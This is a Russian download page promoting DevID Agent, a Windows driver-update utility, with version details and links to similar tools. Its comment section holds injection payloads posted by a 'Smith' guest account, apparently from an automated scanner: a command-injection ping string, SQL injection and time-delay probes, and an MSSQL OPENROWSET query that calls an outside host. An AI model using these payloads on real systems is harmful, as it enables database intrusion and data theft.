» » DevID Agent - помощник установки драйверов.

Программы для Windows


DevID Agent - помощник установки драйверов.

Категория: Драйвера

DevID Agent - помощник установки драйверов.


DevID Agent – программа для автоматического обновления драйверов, с помощью которой, вы легко и быстро установите или обновите драйвера на ПК. Ни для кого не секрет, что одной из самых важных составляющих компьютерного обеспечения, если не самой важной, являются – драйвера. И также, ни для кого не секрет, что даже маленький сбой в их работе приводит порой к катастрофическим последствиям. Поэтому уже давно при возникновении ошибок в программном обеспечении, все специалисты советуют переустановить драйвера.

Установить или переустановить драйвера можно вручную или посредством специальных программ. Ручная установка/переустановка заключается в следующем процессе: в Диспетчере устройства находите нужное оборудование, правой кнопочкой мыши выбираете опцию – обновить конфигурацию. И так по каждому оборудованию. Даже при таком способе, надо сказать трудоемком, возникают ошибки.

Следующий способ – с помощью специальных программ. Каждый пользователь выбирает утилиту себе по вкусу. На более новых ОС, таких как Windows 10, большинство драйверов обновляются автоматически. Будьте внимательны в процессе установки программа предложит установить программный софт от Яндекса, отмените его убрав галочки, если он ван не нужен, как на изображении ниже.

DevID Agent - помощник установки драйверов.


DevID Agent – программа, которая автоматически обновит драйвера в вашей ОС. Она подходит для любой из версий Windows, русифицирована и мала по объему. Для того чтобы начать обновлять драйвера, следует установить её на ПК и, открыв интерфейс, нажать на кнопку «Начать поиск». Утилита в течение некоторого времени будет сканировать ПК на предмет переустановки или установки драйверов.

Результаты поиска будут выведены в виде таблички. Далее вам следует только выбрать какие из драйверов следует установить, расставить в соответствующих квадратах галочки и нажать кнопочку «Установить выбранное». Вот таким нехитрым способом на вашем ПК будут обновлены или заново установлены драйвера.

Я перепробовал много программ по установке драйверов, и могу сказать – у каждой утилиты есть свои достоинства и свои недостатки. А скачать DevID Agent и самостоятельно попробовать, вы можете, перейдя по ссылке указанной ниже.

Ссылка на загрузку

Версия: 4.43
Разработчик: devid.info
Год релиза: 2017
Поддерживаемые ОС: Windows 10, 7, XP, 8.
Языки интерфейса: Русский
Размер файла: 9.66 Мб


Похожие бесплатные программы:

ATIc Install Tool
ATIc Install Tool – очень удобная утилита, которая позволит вам найти и загрузить на компьютер драйвера для видеокарт AMD Radeon серии.Программа работает на всех версиях ОС платформы Windows. ....

Double Driver 4.1
Double Driver представляет собой менеджер драйверов для ОС Windows. Данная утилита позволяет быстро просмотреть все установленные на ПК драйвера и восстанавливать их, если потребуется. Более того, ....

Advanced Driver Updater 2.7 установщик драйверов.
Обновилась версия программы Advanced Driver Updater для работы с драйверами, функционал программы позволит, просканировать и установить неизвестные или обновить устаревшие драйвера. А благодаря ....

SlimDrivers скачать бесплатно
SlimDrivers является полезным инструментом системы, программа сканирует систему в реальном времени и обеспечивает автоматическое обновление ваших драйверов. Создатели SlimDrivers сделали уникальный ....



Коментарии



Smith | Гости

3[left][/left][center][/center][right][/right][hide][/hide]
11 октября 2022 19:17
Smith | Гости

NS09<s1﹥DBLʺSNGLʹNS09

'& ping -n 25 127.0.0.1 &

(SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(10
1),CHAR(109),CHAR(109),CHAR(97)))

DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';'
9;a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','dyr3ifv6ra3syunofrci7-u9wvtvmiyjibj9glrf'
+'rim.r87.me')exec sp_executesql @r

')) WAITFOR DELAY '0:0:25'-- /* e1cb6305-b3a0-4f0b-8c49-3f84a48bde6c */
12 октября 2022 05:34
Панель добавления отзыва
Ваше Имя:


Ваш E-Mail:



Мне нравится Relizua
Группа Вконтакте